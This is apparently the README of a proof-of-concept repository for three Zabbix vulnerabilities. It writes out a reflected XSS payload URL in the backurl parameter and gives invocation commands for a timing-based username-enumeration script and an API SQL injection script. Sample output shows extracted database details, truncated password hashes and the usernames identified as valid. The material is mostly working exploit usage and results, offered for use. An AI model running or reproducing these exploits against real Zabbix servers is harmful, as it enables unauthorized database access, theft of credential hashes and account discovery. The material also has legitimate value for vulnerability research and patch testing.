[CVE-2024-45699 - Zabbix Authenticated Reflected XSS in backurl parameter]
└── PoC:
    http://<target>:8080/zabbix.php?action=export.valuemaps&format=json&backurl=javascript%3Aalert(document.location)

[CVE-2024-36469 - Zabbix User Enumeration via Timing Attack]
└── PoC: CVE-2024-36469.py

[CVE-2024-36465 - Zabbix SQL Injection via groupBy parameter]
A low-privilege (regular) Zabbix user with API access can use an SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL commands via the groupBy parameter.
My comment: Although it states that a low privilege user is required, during testing the account needs to be in the "Zabbix administrators" group or equivalent for the test to work.
└── PoC: CVE-2024-36465.py

CVE-2024-36465
% python3 CVE-2024-36465.py -u Admin -p zabbix --url http://192.168.1.178:8080
Auth token: e9b99463...
Using API URL: http://192.168.1.178:8080/api_jsonrpc.php
Version: 8.0.42
Current DB user: zabbix@192.168.97.4
Current DB: zabbix
Schemas: information_schema, performance_schema, zabbix
Row 0: Zabbix | $2y$10$92nDno4n...1UrEK
Row 1: | $2y$10$89otZrR...7G06
Row 2: test1 | $2y$10$LArpT9d...X0Ry
Row 3: | $2y$10$RESfC8Y...SxIC
Row 4: | $2y$10$eKkmbgy...4PjW

CVE-2024-36469
% python3 CVE-2024-36469.py -U /tmp/users.txt --url http://localhost:8080/ -m 2
[+] Checking http://localhost:8080/index.php for Zabbix interface...
[+] Likely Zabbix login page detected.
[+] Querying Zabbix API version from http://localhost:8080/api_jsonrpc.php...
[+] Confirmed Zabbix server version: 7.0.4
[+] Starting tests on userlist from line 0...
[INVALID] Username: test0 | Time: 0.0152s | Threshold: 0.0485s
[LIKELY VALID] Username: Admin | Time: 0.1368s | Threshold: 0.0485s
[INVALID] Username: test1 | Time: 0.0411s | Threshold: 0.0485s
[INVALID] Username: test2 | Time: 0.0334s | Threshold: 0.0485s
[LIKELY VALID] Username: guest | Time: 0.1320s | Threshold: 0.0485s

CVE-2024-45699
